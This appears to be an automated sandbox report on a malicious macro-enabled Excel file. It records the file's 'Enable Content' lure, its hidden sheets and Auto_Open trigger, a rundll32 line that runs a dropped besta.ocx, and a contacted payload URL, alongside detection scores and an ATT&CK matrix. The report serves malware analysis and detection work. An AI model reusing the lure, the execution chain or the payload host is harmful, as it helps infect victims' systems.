    Source: Screenshot number: 12Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editing, please click "Enable Content
    Source: Screenshot number: 12Screenshot OCR: protected documents. 4 CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE 5 Once you have enabled editin
    Source: Screenshot number: 12Screenshot OCR: Enable Content" button 6 , Gb ) 14 16 17 18 19 20 21 22 23 24 25 26 27 28 29 30
    Source: Document image extraction number: 0Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content"
    Source: Document image extraction number: 0Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
    Source: Document image extraction number: 0Screenshot OCR: Enable Content" button
    Source: Document image extraction number: 1Screenshot OCR: ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, please click "Enable Content'
    Source: Document image extraction number: 1Screenshot OCR: protected documents. CLICK "ENABLE EDITING" FROM YELLOW BAR ABOVE Once you have enabled editing, p
    Source: Document image extraction number: 1Screenshot OCR: Enable Content' button
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk2
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk5
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk1
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk7
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: EFEWF
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk3
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk4
    Source: SCAN_7295943480515097.xlsmMacro extractor: Sheet name: Buk6
    Source: workbook.xmlBinary string: \Desktop\Fil\1d\Cir\" xmlns:x15ac="http://schemas.microsoft.com/office/spreadsheetml/2010/11/ac"/></mc:Choice></mc:AlternateContent><xr:revisionPtr revIDLastSave="0" documentId="13_ncr:1_{8197EE46-A436-4D64-BA91-0FA619A1F240}" xr6:coauthVersionLast="45" xr6:coauthVersionMax="45" xr10:uidLastSave="{00000000-0000-0000-0000-000000000000}"/><bookViews><workbookView xWindow="-120" yWindow="-120" windowWidth="20730" windowHeight="11160" xr2:uid="{00000000-000D-0000-FFFF-FFFF00000000}"/></bookViews><sheets><sheet name="Sheet" sheetId="1" r:id="rId1"/><sheet name="Ss1" sheetId="2" state="hidden" r:id="rId2"/><sheet name="Ss1br2" sheetId="3" state="hidden" r:id="rId3"/><sheet name="Ssbr3" sheetId="4" state="hidden" r:id="rId4"/><sheet name="EFEWF" sheetId="5" state="hidden" r:id="rId5"/><sheet name="Buk1" sheetId="6" state="hidden" r:id="rId6"/><sheet name="Buk2" sheetId="7" state="hidden" r:id="rId7"/><sheet name="Buk3" sheetId="8" state="hidden" r:id="rId8"/><sheet name="Buk4" sheetId="9" state="hidden" r:id="rId9"/><sheet name="Buk5" sheetId="10" state="hidden" r:id="rId10"/><sheet name="Buk6" sheetId="11" state="hidden" r:id="rId11"/><sheet name="Buk7" sheetId="12" state="hidden" r:id="rId12"/></sheets><definedNames><definedName name="LKLW">EFEWF!$D$3</definedName><definedName name="SASA">EFEWF!$D$17</definedName><definedName name="SASA1">EFEWF!$D$19</definedName><definedName name="SASA2">EFEWF!$D$21</definedName><definedName name="_xlnm.Auto_Open">EFEWF!$D$1</definedName></definedNames><calcPr calcId="191029"/><extLst><ext uri="{B58B0392-4F1F-4190-BB64-5DF3571DCE5F}" xmlns:xcalcf="http://schemas.microsoft.com/office/spreadsheetml/2018/calcfeatures"><xcalcf:calcFeatures><xcalcf:feature name="microsoft.com:RD"/><xcalcf:feature name="microsoft.com:FV"/></xcalcf:calcFeatures></ext></extLst></workbook>
    Source: 33AE098B.tmp.0.drOLE stream indicators for Word, Excel, PowerPoint, and Visio: all false
    Source: SCAN_7295943480515097.xlsmVirustotal: Detection: 21%
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4348061343
    Source: unknownProcess created: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE" /automation -Embedding
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4348061343
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess created: C:\Windows\SysWOW64\rundll32.exe C:\Windows\SysWow64\rundll32.exe ..\besta.ocx,44532.4348061343
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCacheJump to behavior
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\{F9890484-3185-4E88-AF21-6A7ED6A45B11} - OProcSessId.datJump to behavior
    Source: classification engineClassification label: mal68.expl.winXLSM@3/7@2/2
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
    Source: Window RecorderWindow detected: More than 3 window changes detected
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/worksheets/sheet4.xml
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/media/image1.png
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet2.xml.rels
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/worksheets/_rels/sheet3.xml.rels
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings2.bin
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/printerSettings/printerSettings3.bin
    Source: SCAN_7295943480515097.xlsmInitial sample: OLE zip file path = xl/calcChain.xml
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Common\LanguageResources\EnabledEditingLanguages
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEFile opened: C:\Windows\SysWOW64\MSVCR100.dll
    Source: 33AE098B.tmp.0.drInitial sample: OLE indicators vbamacros = False
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: FAILCRITICALERRORS | NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
    Source: C:\Windows\SysWOW64\rundll32.exeProcess information set: NOOPENFILEERRORBOX
    Source: EXCEL.EXE, 00000000.00000003.576450267.000000000F843000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765337977.000000000F843000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.757995308.000000000F843000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.762801502.000000000DAD2000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.755312472.000000000F843000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.504042632.000000000F843000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW
    Source: EXCEL.EXE, 00000000.00000003.616931093.0000000015D81000.00000004.00000001.sdmpBinary or memory string: hJ2oKAy8cULD4mZTt5Qocx2uhequnX4mNxDjUY8j64ciLpywHhTZibYsGPurHLpKlTSPvMNetW9Z
    Source: EXCEL.EXE, 00000000.00000003.755251041.000000000F7D1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.765112970.000000000F7D8000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576386896.000000000F7D9000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.503855280.000000000F7DA000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.757746553.000000000F7D3000.00000004.00000001.sdmpBinary or memory string: Hyper-V RAW.microsoft.com
    Source: EXCEL.EXE, 00000000.00000003.755273769.000000000F805000.00000004.00000001.sdmpBinary or memory string: &Vn_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\Device\CdRom0\??\Vol
    Source: Yara matchFile source: app.xml, type: SAMPLE
    Source: EXCEL.EXE, 00000000.00000002.761265331.0000000003170000.00000002.00020000.sdmpBinary or memory string: Program Manager
    Source: EXCEL.EXE, 00000000.00000002.761265331.0000000003170000.00000002.00020000.sdmpBinary or memory string: Shell_TrayWnd
    Source: EXCEL.EXE, 00000000.00000002.761265331.0000000003170000.00000002.00020000.sdmpBinary or memory string: Progman
    Source: EXCEL.EXE, 00000000.00000002.761265331.0000000003170000.00000002.00020000.sdmpBinary or memory string: Progmanlock

    Mitre Att&ck Matrix

    Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
    Valid AccountsScripting1Path InterceptionProcess Injection2Masquerading1OS Credential DumpingSecurity Software Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel1Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
    Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
    Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection2Security Account ManagerFile and Directory Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
    Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Scripting1NTDSSystem Information Discovery2Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol13SIM Card SwapCarrier Billing Fraud
    Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptRundll321LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

    Behavior Graph

    Screenshots

    Thumbnails

    This section contains all screenshots as thumbnails, including those not shown in the slideshow.

    windows-stand

    Antivirus, Machine Learning and Genetic Malware Detection

    Initial Sample

    SourceDetectionScannerLabelLink
    SCAN_7295943480515097.xlsm22%VirustotalBrowse

    Dropped Files

    No Antivirus matches

    Unpacked PE Files

    No Antivirus matches

    Domains

    SourceDetectionScannerLabelLink
    standoutglobal.com3%VirustotalBrowse
    vendes.marketing3%VirustotalBrowse

    URLs

    SourceDetectionScannerLabelLink
    https://vendes.marketing/wp-content/uploads/2021/10/framer.svg0%Avira URL Cloudsafe
    https://settings.outlook.comH0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/conversion-rate-optimizati0%Avira URL Cloudsafe
    https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
    https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-300x102.png0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/anuncios-300x270.png0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=0%Avira URL Cloudsafe
    https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileed0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/visual-Studio.svg0%Avira URL Cloudsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-de-marketing-digital/publicidad-digi0%Avira URL Cloudsafe
    http://vendes.marketing/transmigrant/Wplzr/0%Avira URL Cloudsafe
    https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
    https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/tienda-online-con-magento/0%Avira URL Cloudsafe
    https://o365auditrealtimeingestion.manage.office.comP0%Avira URL Cloudsafe
    https://store.office.cn/addinstemplate0%URL Reputationsafe
    https://vendes.marketing/wp-content/uploads/2021/10/figma.svg0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/plugins/elementor-pro/assets/css/frontend.min.css?ver=3.0.20%Avira URL Cloudsafe
    https://www.odwebp.svc.ms0%URL Reputationsafe
    https://api.addins.store.officeppe.com/addinstemplate0%URL Reputationsafe
    https://vendes.marketing/agencia-de-marketing-digital/consultorias/consultoria-en-marketing-basado-e0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/elementor/css/post-2157.css?ver=16382122820%Avira URL Cloudsafe
    https://vendes.marketing/wp-includes/css/dist/block-library/style.min.css?ver=5.8.20%Avira URL Cloudsafe
    https://vendes.marketing/wp-json/oembed/1.0/embed?url=https%3A%2F%2Fvendes.marketing%2F0%Avira URL Cloudsafe
    https://ncus.contentsync.0%URL Reputationsafe
    https://augloop.office.comLinkRequestApiPageTitleRetrievalhttps://uci.0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/elementor.svg0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/themes/twentytwentyone/assets/css/ie.css?ver=1.40%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/images/caso-exito1.png0%Avira URL Cloudsafe
    https://wus2.contentsync.0%URL Reputationsafe
    https://vendes.marketing/agencia-de-marketing-digital/servicios-creativos/produccion-audiovisual/0%Avira URL Cloudsafe
    https://asgsmsproxyapi.azurewebsites.net/?0%Avira URL Cloudsafe
    https://vendes.marketing/wp-content/uploads/2021/10/anuncios.png0%Avira URL Cloudsafe
    https://skyapi.live.net/Activity/0%URL Reputationsafe
    https://api.cortana.ai0%URL Reputationsafe

    Domains and IPs

    Contacted Domains

    NameIPActiveMaliciousAntivirus DetectionReputation
    standoutglobal.com
    162.240.9.126
    truefalseunknown
    vendes.marketing
    107.180.46.229
    truefalseunknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://vendes.marketing/transmigrant/Wplzr/false
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeech#EXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmpfalse
      high
      https://vendes.marketing/wp-content/uploads/2021/10/framer.svgbesta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
      • Avira URL Cloud: safe
      unknown
      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrEXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
        high
        https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
          high
          https://settings.outlook.comHEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
          • Avira URL Cloud: safe
          unknown
          https://vendes.marketing/agencia-de-marketing-digital/e-commerce-efectivo/conversion-rate-optimizatiEXCEL.EXE, 00000000.00000003.496597476.0000000015D73000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.496513135.0000000015D63000.00000004.00000001.sdmp, besta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
          • Avira URL Cloud: safe
          unknown
          https://rpsticket.partnerservices.getmicrosoftkey.comEXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
          • URL Reputation: safe
          unknown
          https://login.windows.net/common/oauth2/authorizeFj8AEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmpfalse
            high
            https://lookup.onenote.com/lookup/geolocation/v1EXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
              high
              https://vendes.marketing/wp-content/uploads/2021/11/logo-VNDSmkt-final-300x102.pngbesta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
              • Avira URL Cloud: safe
              unknown
              https://login.windows-ppe.net/common/oauth2/authorize-EXCEL.EXE, 00000000.00000003.496815318.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.679242228.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576012897.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301289449.000000001335A000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766565007.0000000013359000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.756617656.0000000013359000.00000004.00000001.sdmpfalse
                high
                https://vendes.marketing/wp-content/uploads/2021/10/anuncios-300x270.pngbesta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                • Avira URL Cloud: safe
                unknown
                https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileEXCEL.EXE, 00000000.00000003.756417957.0000000013449000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301431299.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619881271.0000000013464000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639155238.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497053318.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637228311.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576149956.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.579209762.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.580928076.000000001343E000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505119246.0000000013468000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301501898.000000001348B000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766838985.000000001344A000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                  high
                  https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyEXCEL.EXE, 00000000.00000003.579371357.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.497487929.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576896463.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.678241442.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.505229587.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000002.766929348.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.581187863.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.637299838.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.639236949.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.619931841.00000000134C1000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.301191786.00000000134CF000.00000004.00000001.sdmp, EXCEL.EXE, 00000000.00000003.576218623.00000000134C1000.00000004.00000001.sdmp, 7A7D450E-0610-43BD-BE93-0BD5327AEEE8.0.drfalse
                    high
                    https://vendes.marketing/wp-content/plugins/elementor/assets/lib/font-awesome/css/solid.min.css?ver=besta.ocx.0.dr, P0UY3TPH.htm.0.drfalse
                    • Avira URL Cloud: safe
                    unknown
